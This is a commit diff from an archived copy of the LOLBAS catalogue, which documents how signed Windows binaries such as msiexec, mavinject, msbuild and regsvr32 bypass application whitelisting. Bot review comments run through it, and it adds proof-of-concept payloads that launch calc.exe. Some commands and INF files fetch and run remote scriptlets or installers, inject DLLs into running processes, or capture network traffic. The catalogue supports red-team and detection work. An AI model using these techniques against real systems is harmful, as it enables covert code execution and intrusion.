|   * https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12 | ||||
|   * http://subt0x10.blogspot.no/2017/09/banned-file-execution-via.html | ||||
|   * https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/InstallUtil.md | ||||
|   * https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/ | ||||
|   * https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ | ||||
|     | ||||
| * Full path:    | ||||
|   * C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe | ||||
|   * C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe | ||||
|   * C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | ||||
|   * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe | ||||
|     | ||||
| * Notes: Thanks to Casey Smith - @subtee   | ||||
|     | ||||
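Review bot: the description "Execute the target .NET DLL or EXE" does not say which switch does the work. Of the three shown, `/U` (uninstall) is the one that runs the assembly's installer code, while `/logfile=` with an empty value and `/LogToConsole=false` only silence the installer log; stating that in the description tells a defender which argument to key a detection on and tells a tester that the two log switches are optional.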
							
								
								
									
Archive-Old-Version/OSBinaries/Makecab.exe.md (Normal file, 23 lines)
							| @@ -0,0 +1,23 @@ | ||||
| ## Makecab.exe | ||||
| * Functions: Package, Add ADS, Download | ||||
| ``` | ||||
|  | ||||
| makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab | ||||
| Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file. | ||||
|  | ||||
| makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab | ||||
| Compresses the target file and stores it in the target file. | ||||
|  | ||||
| makecab \\webdavserver\webdav\file.exe C:\Folder\file.txt:file.cab | ||||
| Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\makecab.exe | ||||
|   * c:\windows\sysWOW64\makecab.exe | ||||
|     | ||||
| * Notes: Thanks to Oddvar Moe - @oddvarmoe   | ||||
|     | ||||
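Review bot: the second description, "Compresses the target file and stores it in the target file", uses "target file" for both the source and the destination and so says nothing. Suggest "Fetches file.exe from the WebDAV share and compresses it into C:\Folder\file.cab" for the second example and the matching wording for the third; those two are also where the "Download" function listed at the top is actually demonstrated, since the first example (local autoruns.exe into an ADS) only shows "Package" and "Add ADS".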
							
								
								
									
Archive-Old-Version/OSBinaries/Mavinject.exe.md (Normal file, 22 lines)
							| @@ -0,0 +1,22 @@ | ||||
| ## Mavinject.exe | ||||
| * Functions: Execute, Read ADS | ||||
| ``` | ||||
|  | ||||
| MavInject.exe 3110 /INJECTRUNNING c:\folder\evil.dll | ||||
| Inject evil.dll into a process with PID 3110. | ||||
|  | ||||
| Mavinject.exe 4172 /INJECTRUNNING "c:\ads\file.txt:file.dll" | ||||
| Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://twitter.com/gN3mes1s/status/941315826107510784 | ||||
|   * https://twitter.com/Hexcorn/status/776122138063409152 | ||||
|   * https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ | ||||
|     | ||||
| * Full path:    | ||||
|   * C:\Windows\System32\mavinject.exe | ||||
|   * C:\Windows\SysWOW64\mavinject.exe | ||||
|     | ||||
| * Notes: Thanks to Giuseppe N3mes1s - @gN3mes1s, Adam - @hexacorn, Oddvar Moe - @oddvarmoe   | ||||
|     | ||||
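Review bot: the second resource links to twitter.com/Hexcorn while the Notes line credits @hexacorn; one of the two is a typo and they should agree so the link resolves to the credited account. The entry also has no Notes beyond credits: both examples take a PID as the first argument, and one sentence saying that the caller targets an already-running process (which is what /INJECTRUNNING indicates) would make the "Execute" classification and the process-level detection angle clearer.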
| @@ -0,0 +1,32 @@ | ||||
| <?xml version="1.0" encoding="utf-8"?> | ||||
| <CompilerInput xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.datacontract.org/2004/07/Microsoft.Workflow.Compiler"> | ||||
| <files xmlns:d2p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays"> | ||||
| <d2p1:string>Microsoft.Workflow.Compiler.xoml</d2p1:string> | ||||
| </files> | ||||
| <parameters xmlns:d2p1="http://schemas.datacontract.org/2004/07/System.Workflow.ComponentModel.Compiler"> | ||||
| <assemblyNames xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" /> | ||||
| <compilerOptions i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" /> | ||||
| <coreAssemblyFileName xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"></coreAssemblyFileName> | ||||
| <embeddedResources xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" /> | ||||
| <evidence xmlns:d3p1="http://schemas.datacontract.org/2004/07/System.Security.Policy" i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" /> | ||||
| <generateExecutable xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">false</generateExecutable> | ||||
| <generateInMemory xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">true</generateInMemory> | ||||
| <includeDebugInformation xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">false</includeDebugInformation> | ||||
| <linkedResources xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" /> | ||||
| <mainClass i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" /> | ||||
| <outputName xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"></outputName> | ||||
| <tempFiles i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" /> | ||||
| <treatWarningsAsErrors xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">false</treatWarningsAsErrors> | ||||
| <warningLevel xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">-1</warningLevel> | ||||
| <win32Resource i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" /> | ||||
| <d2p1:checkTypes>false</d2p1:checkTypes> | ||||
| <d2p1:compileWithNoCode>false</d2p1:compileWithNoCode> | ||||
| <d2p1:compilerOptions i:nil="true" /> | ||||
| <d2p1:generateCCU>false</d2p1:generateCCU> | ||||
| <d2p1:languageToUse>CSharp</d2p1:languageToUse> | ||||
| <d2p1:libraryPaths xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" i:nil="true" /> | ||||
| <d2p1:localAssembly xmlns:d3p1="http://schemas.datacontract.org/2004/07/System.Reflection" i:nil="true" /> | ||||
| <d2p1:mtInfo i:nil="true" /> | ||||
| <d2p1:userCodeCCUs xmlns:d3p1="http://schemas.datacontract.org/2004/07/System.CodeDom" i:nil="true" /> | ||||
| </parameters> | ||||
| </CompilerInput> | ||||
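Review bot: this CompilerInput carries no comment saying what it is or how it pairs with the .xoml hunk that follows, unlike Payload/Msbuild.csproj in this same commit, which opens with a comment naming the invoking binary. The `<files>` element references `Microsoft.Workflow.Compiler.xoml` by bare name, so the two files must sit together in the working directory; an XML comment stating that, and naming the LOLBin entry this payload belongs to, would save the next reader from reverse-engineering the data-contract namespaces.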
| @@ -0,0 +1,10 @@ | ||||
| <SequentialWorkflowActivity x:Class="MyWorkflow" x:Name="MyWorkflow" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/workflow"> | ||||
|     <CodeActivity x:Name="codeActivity1" /> | ||||
|     <x:Code><![CDATA[ | ||||
|     public class Foo : SequentialWorkflowActivity { | ||||
|      public Foo() { | ||||
|             Console.WriteLine("FOOO!!!!"); | ||||
|         } | ||||
|     } | ||||
|     ]]></x:Code> | ||||
| </SequentialWorkflowActivity> | ||||
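Review bot: the x:Code block declares `public class Foo : SequentialWorkflowActivity` while the root element sets x:Class="MyWorkflow", so the embedded code is a second class rather than the code-behind of the workflow being compiled; if that is intentional, a comment saying which class the compiler ends up instantiating would help, and if not, the two names should match. The code also calls `Console.WriteLine` with no `using System;` in the block and so relies on whatever imports the workflow compiler adds implicitly; `System.Console.WriteLine(...)` is safer. The indentation of `public Foo()` (one space) does not line up with the surrounding four-space blocks either.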
							
								
								
									
Archive-Old-Version/OSBinaries/Msbuild.exe.md (Normal file, 27 lines)
							| @@ -0,0 +1,27 @@ | ||||
| ## Msbuild.exe | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| msbuild.exe pshell.xml | ||||
| Build and execute a C# project stored in the target XML file. | ||||
|  | ||||
| msbuild.exe Msbuild.csproj | ||||
| Build and execute a C# project stored in the target CSPROJ file. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Trusted_Developer_Utilities.md | ||||
|   * https://github.com/Cn33liz/MSBuildShell | ||||
|   * https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/ | ||||
|   * https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ | ||||
|     | ||||
| * Full path:    | ||||
|   * C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe | ||||
|   * C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe | ||||
|   * C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe | ||||
|   * C:\Windows\Microsoft.NET\Framework64\v3.5\Msbuild.exe | ||||
|   * C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe | ||||
|   * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe | ||||
|     | ||||
| * Notes: Thanks to Casey Smith - @subtee, Cn33liz - @Cneelis   | ||||
|     | ||||
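Review bot: the Notes line only carries credits, while this commit adds Payload/Msbuild.csproj; point at it the way the Msconfig.exe and Msdt.exe entries point at their payloads, since the second example (`msbuild.exe Msbuild.csproj`) is exactly that file. The first example names `pshell.xml`, which is not in the Payload folder and is only reachable through the MSBuildShell resource link; either say so in the description or drop that example so the entry stays self-contained.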
							
								
								
									
Archive-Old-Version/OSBinaries/Msconfig.exe.md (Normal file, 18 lines)
							| @@ -0,0 +1,18 @@ | ||||
| ## Msconfig.exe | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| Msconfig.exe -5 | ||||
| Executes command embeded in crafted c:\windows\system32\mscfgtlc.xml. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://twitter.com/pabraeken/status/991314564896690177 | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\msconfig.exe | ||||
|     | ||||
| * Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken | ||||
| See the Payloads folder for an example mscfgtlc.xml file. | ||||
|    | ||||
|     | ||||
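Review bot: "embeded" in the description should be "embedded". The example depends on a crafted file at c:\windows\system32\mscfgtlc.xml, and the entry does not say that writing into System32 requires an elevated context; that is the precondition a reader, and a detection rule keyed on file creation in that directory, cares about most, so state it in Notes next to the Payloads pointer.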
							
								
								
									
Archive-Old-Version/OSBinaries/Msdt.exe.md (Normal file, 24 lines)
							| @@ -0,0 +1,24 @@ | ||||
| ## Msdt.exe | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| Open .diagcab package | ||||
|  | ||||
|  | ||||
| msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE | ||||
| Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/ | ||||
|   * https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/ | ||||
|   * https://twitter.com/harr0ey/status/991338229952598016 | ||||
|     | ||||
| * Full path:    | ||||
|   * C:\Windows\System32\Msdt.exe     | ||||
|   * C:\Windows\SysWOW64\Msdt.exe     | ||||
|     | ||||
| * Notes: Thanks to: | ||||
| See the Payloads folder for an example PCW8E57.xml file. | ||||
|    | ||||
|     | ||||
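Review bot: the first item in the code block, "Open .diagcab package", has no command line beneath it, and the "Thanks to:" line at the bottom names nobody; both read as placeholders left over from drafting. Either add the .diagcab command and the credit or remove the dangling line so the block keeps the one-command-one-description layout of the other entries. The -path example says it "executes the malicious .MSI referenced in the PCW8E57.xml file"; the Payload copy of that file points at C:\Windows\assembly\Exec-Execute.msi, and naming that path in Notes would make the link between the entry and its payload explicit.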
							
								
								
									
Archive-Old-Version/OSBinaries/Msiexec.exe.md (Normal file, 27 lines)
							| @@ -0,0 +1,27 @@ | ||||
| ## Msiexec.exe | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| msiexec /quiet /i cmd.msi | ||||
| Installs the target .MSI file silently. | ||||
|  | ||||
| msiexec /q /i http://192.168.100.3/tmp/cmd.png | ||||
| Installs the target remote & renamed .MSI file silently. | ||||
|  | ||||
| msiexec /y "C:\folder\evil.dll" | ||||
| Calls DLLRegisterServer to register the target DLL. | ||||
|  | ||||
| msiexec /z "C:\folder\evil.dll" | ||||
| Calls DLLRegisterServer to un-register the target DLL. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/ | ||||
|   * https://twitter.com/PhilipTsukerman/status/992021361106268161 | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\msiexec.exe | ||||
|   * c:\windows\sysWOW64\msiexec.exe | ||||
|     | ||||
| * Notes: Thanks to ? - @netbiosX, PhilipTsukerman - @PhilipTsukerman   | ||||
|     | ||||
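Review bot: the `/z` description says "Calls DLLRegisterServer to un-register the target DLL"; unregistration goes through the DLL's DllUnregisterServer export, so the line should read "Calls DllUnregisterServer to unregister the target DLL" (and the `/y` line "DllRegisterServer", matching the export's real casing). The credit "Thanks to ? - @netbiosX" still has a "?" placeholder where the name goes.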
							
								
								
									
Archive-Old-Version/OSBinaries/Netsh.exe.md (Normal file, 27 lines)
							| @@ -0,0 +1,27 @@ | ||||
| ## Netsh.exe | ||||
| * Functions: Execute, Surveillance | ||||
| ``` | ||||
|  | ||||
| netsh.exe trace start capture=yes filemode=append persistent=yes tracefile=\\server\share\file.etl IPv4.Address=!(<IPofRemoteFileShare>) | ||||
| netsh.exe trace show status | ||||
|  | ||||
| Capture network traffic on remote file share. | ||||
|  | ||||
| netsh.exe add helper C:\Path\file.dll | ||||
| Load (execute) NetSh.exe helper DLL file. | ||||
|  | ||||
| netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1 | ||||
| Forward traffic from the listening address and proxy to a remote system. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Persistence/Netsh_Helper_DLL.md | ||||
|   * https://attack.mitre.org/wiki/Technique/T1128 | ||||
|   * https://twitter.com/teemuluotio/status/990532938952527873 | ||||
|     | ||||
| * Full path:    | ||||
|   * C:\Windows\System32 | ||||
|   * C:\Windows\SysWOW64 | ||||
|     | ||||
| * Notes:    | ||||
|     | ||||
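Review bot: the Full path entries list the directories C:\Windows\System32 and C:\Windows\SysWOW64 without the file name, unlike every other entry in this commit; append `\netsh.exe`. In the first example the description "Capture network traffic on remote file share" is separated from its two commands by a blank line, which no other entry does, and the Notes line is empty; since the `trace start` example writes to `\\server\share\file.etl` with `persistent=yes` (the trace session survives a reboot), a Notes sentence on that flag would tell readers why this sits under Surveillance and what to look for on the host.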
							
								
								
									
Archive-Old-Version/OSBinaries/Nltest.exe.md (Normal file, 17 lines)
							| @@ -0,0 +1,17 @@ | ||||
| ## Nltest.exe | ||||
| * Functions: Credentials | ||||
| ``` | ||||
|  | ||||
| nltest.exe /SERVER:192.168.1.10 /QUERY | ||||
|  | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://twitter.com/sysopfb/status/986799053668139009 | ||||
|   * https://ss64.com/nt/nltest.html | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\nltest.exe | ||||
|     | ||||
| * Notes: Thanks to Sysopfb - @sysopfb   | ||||
|     | ||||
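Review bot: the single command `nltest.exe /SERVER:192.168.1.10 /QUERY` has no description line, so the "Credentials" function at the top is unexplained; every other entry pairs each command with a one-line description. Add one stating what the query returns (the ss64 resource documents the switches), since a reader cannot tell from the entry whether this is discovery, credential access, or both.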
							
								
								
									
Archive-Old-Version/OSBinaries/Openwith.exe.md (Normal file, 20 lines)
							| @@ -0,0 +1,20 @@ | ||||
| ## Openwith.exe | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| OpenWith.exe /c C:\test.hta | ||||
| Opens the target file with the default application. | ||||
|  | ||||
| OpenWith.exe /c C:\testing.msi | ||||
| Opens the target file with the default application. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://twitter.com/harr0ey/status/991670870384021504 | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\Openwith.exe | ||||
|   * c:\windows\sysWOW64\Openwith.exe | ||||
|     | ||||
| * Notes: Thanks to Matt harr0ey - @harr0ey   | ||||
|     | ||||
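Review bot: the two examples carry the identical description "Opens the target file with the default application" and differ only in the argument's extension (.hta, .msi); neither says what `/c` does. Either fold them into one example whose description explains the switch and notes that the launched handler follows the file's registered association, or give the second example a description that says why .msi is worth listing separately.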
							
								
								
									
Archive-Old-Version/OSBinaries/Payload/Cmstp.inf (Normal file, 14 lines)
							| @@ -0,0 +1,14 @@ | ||||
| [version] | ||||
| Signature=$chicago$ | ||||
| AdvancedINF=2.5 | ||||
|  | ||||
| [DefaultInstall_SingleUser] | ||||
| UnRegisterOCXs=UnRegisterOCXSection | ||||
|  | ||||
| [UnRegisterOCXSection] | ||||
| %11%\scrobj.dll,NI,https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp_calc.sct | ||||
|  | ||||
| [Strings] | ||||
| AppAct = "SOFTWARE\Microsoft\Connection Manager" | ||||
| ServiceName="Yay" | ||||
| ShortSvcName="Yay" | ||||
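Review bot: the [UnRegisterOCXSection] line fetches the scriptlet from a raw.githubusercontent.com URL pinned to the master branch, so running this INF reaches out to GitHub and its behaviour changes whenever that remote file changes; for a test fixture, a local path (this commit adds Payload/Cmstp_calc.sct beside this file) is reproducible and does not generate outbound traffic that a reader's proxy logs will flag. `Signature=$chicago$` is also lowercase here while the other INF in this commit uses `$CHICAGO$`; pick one.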
							
								
								
									
Archive-Old-Version/OSBinaries/Payload/Cmstp_calc.sct (Normal file, 23 lines)
							| @@ -0,0 +1,23 @@ | ||||
| <?XML version="1.0"?> | ||||
| <scriptlet> | ||||
| <registration  | ||||
|     progid="PoC" | ||||
|     classid="{F0001111-0000-0000-0000-0000FEEDACDC}" > | ||||
| 	<!-- regsvr32 /s /u /i:http://example.com/file.sct scrobj.dll --> | ||||
|  | ||||
| 	<!-- .sct files when downloaded, are executed from a path like this --> | ||||
| 	<!-- Please Note, file extenstion does not matter --> | ||||
| 	<!-- Though, the name and extension are arbitary.. --> | ||||
| 	<!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct --> | ||||
| 	<!-- Based on current research, no registry keys are written, since call "uninstall" --> | ||||
|   	<!-- You can either execute locally, or from a url --> | ||||
| 	<script language="JScript"> | ||||
| 		<![CDATA[ | ||||
| 	    		// calc.exe should launch, this could be any arbitrary code. | ||||
|       	   		// What you are hoping to catch is the cmdline, modloads, or network connections, or any variation | ||||
| 			var r = new ActiveXObject("WScript.Shell").Run("calc.exe");	 | ||||
| 	 | ||||
| 		]]> | ||||
| </script> | ||||
| </registration> | ||||
| </scriptlet> | ||||
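Review bot: this file is line for line the same as Payload/Regsvr32_calc.sct further down, including the leading comment `regsvr32 /s /u /i:http://example.com/file.sct scrobj.dll`, which is the regsvr32 invocation and not the CMSTP one; a reader of the Cmstp entry will be misled by it. Either keep one scriptlet and reference it from both INFs, or replace the comment with the usage that applies here. Typos in the comments: "extenstion", "arbitary".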
							
								
								
									
Archive-Old-Version/OSBinaries/Payload/Evil.xbap (Normal file, 8 lines)
							| @@ -0,0 +1,8 @@ | ||||
| private void Button_click(object sender, RoutedEventArgs e) | ||||
| { | ||||
| 	if (RadioButton1.IsChecked == true) | ||||
| 	{ | ||||
| 		Process.Start("C:\\poc\\evil.exe"); | ||||
| 		MessageBox.Show("BHello."); | ||||
| 	} | ||||
| } | ||||
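Review bot: the content is a C# event handler, not an XBAP: an .xbap file is the XML deployment manifest that PresentationHost.exe loads, and this snippet is the code-behind that would be compiled into the application behind such a manifest. Rename it (Evil.xbap.cs) or add a comment saying it is the code-behind and that the project and manifest it belongs to are not included; as committed, the `Presentationhost.exe C:\temp\Evil.xbap` example in the PresentationHost entry cannot be reproduced from this file. The snippet also uses `Process` and `MessageBox` without namespace imports, and "BHello." looks like a typo.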
| @@ -0,0 +1,8 @@ | ||||
| [Version]  | ||||
| Signature=$CHICAGO$ | ||||
|  | ||||
| [DefaultInstall] | ||||
| UnregisterDlls = Squiblydoo | ||||
|  | ||||
| [Squiblydoo] | ||||
| 11,,scrobj.dll,2,60,https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Infdefaultinstall_calc.sct | ||||
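Review bot: the [Squiblydoo] line pulls the scriptlet from a raw.githubusercontent.com URL on master, the same remote dependency as Cmstp.inf above; a local reference to the Infdefaultinstall_calc.sct added in this commit keeps the fixture reproducible and offline. The file also has no `;` comment naming the binary that consumes it (InfDefaultInstall.exe), and the `[Version]` header line carries trailing whitespace.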
| @@ -0,0 +1,16 @@ | ||||
| <?XML version="1.0"?> | ||||
| <scriptlet> | ||||
| <registration  | ||||
|     progid="PoC" | ||||
|     classid="{F0001111-0000-0000-0000-0000FEEDACDC}" > | ||||
| 	<!-- Proof Of Concept - Casey Smith @subTee --> | ||||
| 	<!--  License: BSD3-Clause --> | ||||
| 	<script language="JScript"> | ||||
| 		<![CDATA[ | ||||
| 	 | ||||
| 			var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); | ||||
| 	 | ||||
| 		]]> | ||||
| </script> | ||||
| </registration> | ||||
| </scriptlet> | ||||
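Review bot: the declaration `<?XML version="1.0"?>` is uppercase in this and the other three .sct files in the commit; the XML declaration is lowercase `<?xml`, and a processing instruction whose target is `XML` in any casing is reserved and rejected by conforming parsers. scrobj.dll tolerates it, but any tooling that validates these scriptlets, including a detection pipeline that parses them, will not; lowercase it in all four.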
							
								
								
									
Archive-Old-Version/OSBinaries/Payload/Msbuild.csproj (Normal file, 47 lines)
							| @@ -0,0 +1,47 @@ | ||||
| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | ||||
|   <!-- This inline task executes c# code. --> | ||||
|   <!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildBypass.csproj --> | ||||
|   <!-- Feel free to use a more aggressive class for testing. --> | ||||
|   <Target Name="Hello"> | ||||
|    <FragmentExample /> | ||||
|    <ClassExample /> | ||||
|   </Target> | ||||
|   <UsingTask | ||||
|     TaskName="FragmentExample" | ||||
|     TaskFactory="CodeTaskFactory" | ||||
|     AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" > | ||||
|     <ParameterGroup/> | ||||
|     <Task> | ||||
|       <Using Namespace="System" />   | ||||
|       <Code Type="Fragment" Language="cs"> | ||||
|         <![CDATA[ | ||||
| 			    Console.WriteLine("Hello From a Code Fragment");		 | ||||
|         ]]> | ||||
|       </Code> | ||||
|     </Task> | ||||
| 	</UsingTask> | ||||
| 	<UsingTask | ||||
|     TaskName="ClassExample" | ||||
|     TaskFactory="CodeTaskFactory" | ||||
|     AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" > | ||||
| 	<Task> | ||||
| 	<!-- <Reference Include="System.IO" /> Example Include -->		 | ||||
|       <Code Type="Class" Language="cs"> | ||||
|         <![CDATA[ | ||||
| 			using System; | ||||
| 			using Microsoft.Build.Framework; | ||||
| 			using Microsoft.Build.Utilities; | ||||
| 				 | ||||
| 			public class ClassExample :  Task, ITask | ||||
| 			{ | ||||
| 				public override bool Execute() | ||||
| 				{ | ||||
| 					Console.WriteLine("Hello From a Class."); | ||||
| 					return true; | ||||
| 				} | ||||
| 			} | ||||
|         ]]> | ||||
|       </Code> | ||||
|     </Task> | ||||
|   </UsingTask> | ||||
| </Project> | ||||
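Review bot: the usage comment on the third line says `msbuild.exe MSBuildBypass.csproj` but the file is committed as Msbuild.csproj and the Msbuild.exe entry invokes `msbuild.exe Msbuild.csproj`; update the comment so it can be copied as-is. `public class ClassExample : Task, ITask` is redundant because `Microsoft.Build.Utilities.Task` already implements `ITask`. Indentation mixes tabs and spaces (`</UsingTask>` and the second `<UsingTask` are tab-indented, the rest two-space).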
							
								
								
									
Archive-Old-Version/OSBinaries/Payload/Mshta_calc.sct (Normal file, 43 lines)
							| @@ -0,0 +1,43 @@ | ||||
| <?XML version="1.0"?> | ||||
| <scriptlet> | ||||
|  | ||||
| <registration | ||||
|     description="Bandit" | ||||
|     progid="Bandit" | ||||
|     version="1.00" | ||||
|     classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}" | ||||
| 	> | ||||
|  | ||||
| 	<!-- regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll | ||||
| 	<!-- DFIR --> | ||||
| 	<!--		.sct files are downloaded and executed from a path like this --> | ||||
| 	<!-- Though, the name and extension are arbitary.. --> | ||||
| 	<!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct --> | ||||
| 	<!-- Based on current research, no registry keys are written, since call "uninstall" --> | ||||
|  | ||||
|  | ||||
| 	<!-- Proof Of Concept - Casey Smith @subTee --> | ||||
| 	<script language="JScript"> | ||||
| 		<![CDATA[ | ||||
|  | ||||
| 			var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); | ||||
|  | ||||
| 		]]> | ||||
| 	</script> | ||||
| </registration> | ||||
|  | ||||
| <public> | ||||
|     <method name="Exec"></method> | ||||
| </public> | ||||
| <script language="JScript"> | ||||
| <![CDATA[ | ||||
|  | ||||
| 	function Exec() | ||||
| 	{ | ||||
| 		var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); | ||||
| 	} | ||||
|  | ||||
| ]]> | ||||
| </script> | ||||
|  | ||||
| </scriptlet> | ||||
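Review bot: the comment opened on the `<!-- regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll` line is never closed, so it runs into the next line and only ends at the `-->` after "DFIR"; the resulting comment text contains `<!--`, and a double hyphen inside a comment is not well-formed XML. Close the first comment with `-->` on its own line. The file also launches calc.exe twice, once from the registration-time script and once from the public `Exec` method; a comment stating which of the two the Mshta entry relies on would explain why both are present.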
							
								
								
									
Archive-Old-Version/OSBinaries/Payload/PCW8E57.xml (Normal file, 13 lines)
							| @@ -0,0 +1,13 @@ | ||||
|  | ||||
| <?xml version="1.0" encoding="utf-16"?> | ||||
| <Answers Version="1.0"> | ||||
| 	<Interaction ID="IT_LaunchMethod"> | ||||
| 		<Value>ContextMenu</Value> | ||||
| 	</Interaction> | ||||
| 	<Interaction ID="IT_SelectProgram"> | ||||
| 		<Value>NotListed</Value> | ||||
| 	</Interaction> | ||||
| 	<Interaction ID="IT_BrowseForFile"> | ||||
| 		<Value>C:\Windows\assembly\Exec-Execute.msi</Value> | ||||
| 	</Interaction> | ||||
| </Answers> | ||||
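Review bot: the first line of the file is blank and the `<?xml ... ?>` declaration sits on line two; an XML declaration is only valid as the very first bytes of the document, so strict parsers reject this file. The declaration also says `encoding="utf-16"`; if the file is stored as UTF-8 (the diff shows it as ordinary single-byte text), a parser that honours the declaration will fail, so either save it as UTF-16 or change the attribute to utf-8. Remove the leading blank line in either case.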
							
								
								
									
Archive-Old-Version/OSBinaries/Payload/Regsvr32_calc.sct (Normal file, 23 lines)
							| @@ -0,0 +1,23 @@ | ||||
| <?XML version="1.0"?> | ||||
| <scriptlet> | ||||
| <registration  | ||||
|     progid="PoC" | ||||
|     classid="{F0001111-0000-0000-0000-0000FEEDACDC}" > | ||||
| 	<!-- regsvr32 /s /u /i:http://example.com/file.sct scrobj.dll --> | ||||
|  | ||||
| 	<!-- .sct files when downloaded, are executed from a path like this --> | ||||
| 	<!-- Please Note, file extenstion does not matter --> | ||||
| 	<!-- Though, the name and extension are arbitary.. --> | ||||
| 	<!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct --> | ||||
| 	<!-- Based on current research, no registry keys are written, since call "uninstall" --> | ||||
|   	<!-- You can either execute locally, or from a url --> | ||||
| 	<script language="JScript"> | ||||
| 		<![CDATA[ | ||||
| 	    		// calc.exe should launch, this could be any arbitrary code. | ||||
|       	   		// What you are hoping to catch is the cmdline, modloads, or network connections, or any variation | ||||
